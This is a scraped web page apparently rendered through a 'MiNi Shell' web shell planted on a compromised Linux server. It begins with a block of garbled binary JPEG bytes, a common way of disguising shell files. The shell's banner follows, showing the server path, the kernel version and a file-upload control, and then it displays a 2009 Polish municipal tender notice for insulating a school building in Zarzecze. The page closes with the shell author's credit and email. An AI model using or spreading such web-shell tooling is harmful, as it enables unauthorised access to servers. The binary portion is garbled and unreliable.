JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/67396-N-2009.html

<p class="kh_header"><b>Łodygowice: Termomodernizacja budynku Zespołu Szkolno Przedszkolnego w Zarzeczu przy ul. Staszica 8.</b><br>
<b>Numer ogłoszenia: 67396 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Łodygowice , ul. Piłsudskiego 75, 34-325 Łodygowice, woj. śląskie, tel. 033 8602778, faks 033 8631303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodygowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Zespołu Szkolno Przedszkolnego w Zarzeczu przy ul. Staszica 8..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest termomodernizacja budynku Zespołu Szkolno Przedszkolnego w Zarzeczu przy ul. Staszica 8 polegająca na :
a)	ociepleniu ścian styropianem grubości 12 cm - pow. 910 m2
b)	ociepleniu stropodachu wełną mineralną grubości 15 cm -  pow. 490 m2
c)	wymianie okien o pow. 243 m2
d)	wymianie instalacji grzewczych, modernizacji kotłowni gazowej oraz modernizacji instalacji ciepłej wody użytkowej - 1 kpl.

Ad.a)
Ocieplenie ścian budynku styropianem grubości 12 cm odmiany 15 o współczynniku przewodności cieplnej 0,04 W/m2K. 
Ad.b)
Ocieplenie stropu granulatem wełny mineralnej grubości 15 cm o współczynniku przewodności cieplnej 0,04 W/m2K wraz z folią zewnętrzną i wewnętrzną
Ad.c)
Wymiana okien drewnianych o współczynniku 2,8 W/m2.K na okna o współczynniku 1,2 W/m2.K. Łączna pow. okien 224,6 m2.
Ad.d)
Wymiana instalacji grzewczych obejmie 1414 m2 pow. użytkowej.

2. 	Przedmiot zamówienia należy wykonać zgodnie: 
- 	z przedmiarami robót, stanowiącymi załącznik Nr 6 do Specyfikacji, 
- 	ze Specyfikacją techniczną wykonania i odbioru robót budowlanych, stanowiącą załącznik Nr 7 do Specyfikacji, 
- 	dokumentacja projektową stanowiącą załącznik nr 8 do Specyfikacji.
3.	 Wykonawca w celu prawidłowego sporządzenia oferty winien sprawdzić w terenie warunki wykonania  zamówienia, jak również zgromadzić wszystkie niezbędne informacje..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.26.14.10-1, 45.42.11.32-8, 45.44.21.20-4, 45.33.11.10-0, 45.33.11.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający przewiduje obowiązek wniesienia wadium w wysokości 22 000,00 PLN.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:
1)	spełniają warunki określone w art. 22 ust. 1 ustawy w tym: 
a)	dysponują co najmniej 10 pracownikami którzy wykonywa będą przedmiot zamówienia. Co najmniej 1 z w/w pracowników musi posiadać uprawnienia:
-	do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej ( o których mowa w ustawie z dnia 7 lipca 1994r. Prawo budowlane tekst jedn. Dz.U. z 2006r. Nr 156, poz 1118 ze zm), będący członkiem właściwej izby samorządu zawodowego, 
-	do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, ( o których mowa w ustawie z dnia 7 lipca 1994r. Prawo budowlane tekst jedn. Dz.U. z 2006r. Nr 156, poz 1118 ze zm), będących członkiem właściwej izby samorządu zawodowego; 
b)	w okresie ostatnich 5 lat od dnia wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej 1 robotę budowlaną odpowiadającą swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia, tj. wykonali w ramach jednego kontraktu/umowy termomodernizację budynku polegającą co najmniej na:
-	ociepleniu ścian zewnętrznych budynku o powierzchni nie mniejszej niż 500 m2,    	
-	wymianie lub montażu nowych okien,
-	modernizacji lub budowie nowych instalacji grzewczych,
-	modernizacji lub budowie nowej kotłowni gazowej, 
Wartość każdego kontraktu/umowy (obejmującego w/w zakres), przedstawionego na potwierdzenie posiadania doświadczenia nie może by mniejsza niż 50% ceny brutto oferty składanej w przedmiotowym postępowaniu o udzielenie zamówienia publicznego.
c)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż cena oferty (brutto).
2)	zapoznali się z warunkami udziału w postępowaniu zawartymi w Specyfikacji Istotnych Warunków Zamówienia wraz z jej załącznikami i przyjęli je bez zastrzeżeń;
3)	udzielą zamawiającemu minimum 5-letniej rękojmi na wykonane zamówienie oraz zapewnią minimum 10-letnią rękojmię lub gwarancję jakości na zamontowaną stolarkę okienną
4)	wnieśli wadium.
2.	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie analizy formalno-prawnej i merytorycznej oświadczeń i dokumentów złożonych przez wykonawców. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy, zamawiający żąda następujących dokumentów:
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - warunek aktualności spełniać będzie również dokument wystawiony z datą wcześniejszą, lecz odpowiednio potwierdzony przez organ wydający w wymaganym terminie;
2)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3)	pełnomocnictwo udzielane osobom podpisującym dokumenty ofertowe, o ile prawo do reprezentowania wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych - postanowienie niniejsze stosuje się odpowiednio do reprezentowania wykonawcy powołanego i funkcjonującego na podstawie przepisów ustaw. 

2.	W celu potwierdzenia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda następujących dokumentów:
1)	wykaz wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych (co najmniej 1 robota budowlana), których przedmiot obejmował wykonanie:

		-	ocieplenie ścian zewnętrznych budynku o powierzchni nie mniejszej niż 500 m2,    	-	wymiana lub montaż nowych okien,
-	modernizacja lub budowa nowych instalacji grzewczych,
-	modernizacja lub budowa nowej kotłowni gazowej, 
wraz z podaniem daty i miejsca ich wykonania (zał. Nr 4 do Specyfikacji) oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie. Z dokumentów tych powinno jasno wynikać: zakres robót, z którego wynikać będzie, że Wykonawca w jednym zadaniu ocieplił przynajmniej 500 m2 budynku, w tym zadaniu wymienił lub zamontował okna, zmodernizował lub wybudował instalacje grzewczą, zmodernizował lub wybudował kotłownię gazową. 
Wartość każdego kontraktu/umowy (obejmującego w/w zakres), przedstawionego na potwierdzenie posiadania doświadczenia nie może by mniejsza niż 50% ceny brutto oferty składanej w przedmiotowym postępowaniu o udzielenie zamówienia publicznego.
 Oznacza to, że w przypadku przedkładania dokumentów, z których wynikać będzie większy zakres wykonanych robót (a nie związanych z przedmiotem tego postępowania), to Zamawiający winien bez żadnych wątpliwości odczytać wymagany przez siebie zakres wykonanych robót wraz z żądaną wartością brutto wyrażoną w złotych (dla tych robót).
2)	Oświadczenie o dysponowaniu osobami zdolnymi do wykonania zamówienia (zał. Nr 3 do Specyfikacji)
3)	dokumenty potwierdzające, że osoby które wykonywa będą przedmiot zamówienia posiadają uprawnienia wymagane przez Zamawiającego oraz zaświadczenia właściwej izby samorządu zawodowego z określonym w nim terminem ważności.

3.	W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów:
1)	polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż cena oferty (brutto).

4.	Pozostałe oświadczenia i dokumenty:
1)	wypełniony Formularz ofertowy (zał. Nr 1 do Specyfikacji) zawierający m.in.:
-	oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia wraz ze wszystkimi załącznikami i przyjęciu ich bez zastrzeżeń oraz o uznaniu się za związanymi określonymi w niej postanowieniami i zasadami postępowania, 
-	oświadczenie o przyjęciu:  terminu płatności i terminu związania ofertą 
-	oświadczenie o udzielonym okresie rękojmi  na wykonany przedmiot zamówienia.
2)	oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy (zał. Nr 2 do Specyfikacji), a także - jeżeli wynika to ze złożonego oświadczenia - zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wykonawców w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
4)	sporządzony - w oparciu o przedmiary robót - kosztorys ofertowy.
5.	UWAGA!!! Dokumenty i oświadczenia, o których mowa wyżej, należy przedłożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę lub osobę upoważnioną do składania oświadczeń woli w imieniu wykonawcy - zgodnie z załączonym pełnomocnictwem.
6.	Zaleca się aby każda ze stron oferty była ponumerowana i zaparafowana przez Wykonawcę.
7.	W przypadku, gdy złożona przez wykonawcę kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości co do jej prawdziwości, zamawiający może zażądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.
8.	Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę lub osobę upoważnioną do składania oświadczeń woli w imieniu wykonawcy - zgodnie z załączonym upoważnieniem.
9.	W przypadku wykonawców wspólnie ubiegających się o zamówienie, warunki wynikające z art. 22 ust. 1 pkt 1 i 4 (warunki formalne lub warunki stanowiące o prawie wykonawcy do ubiegania się o zamówienia publiczne) muszą być spełnione oddzielnie przez każdego z wykonawców składających ofertę wspólnie, natomiast warunki wynikające z art. 22 ust. 1 pkt 2 i 3 (warunki materialne lub warunki potwierdzające zdolność wykonawcy do wykonania przedmiotowego zamówienia) mogą być spełnione łącznie przez wszystkich wykonawców ubiegających się o udzielenie zamówienia. Złożone przez Wykonawców ubiegających się o zamówienie oświadczenia, o których mowa wyżej powinny potwierdzać spełnianie warunków wynikających z art. 22 ust. 1 pkt 1 - 4 Pzp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lodygowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łodygowice
ul. Piłsudskiego 75
34-325 Łodygowice
pok. nr 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2009 godzina 10:00, miejsce: Urząd Gminy Łodygowice
ul. Piłsudskiego 75
34-325 Łodygowice
Biuro obsługi klienta (parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com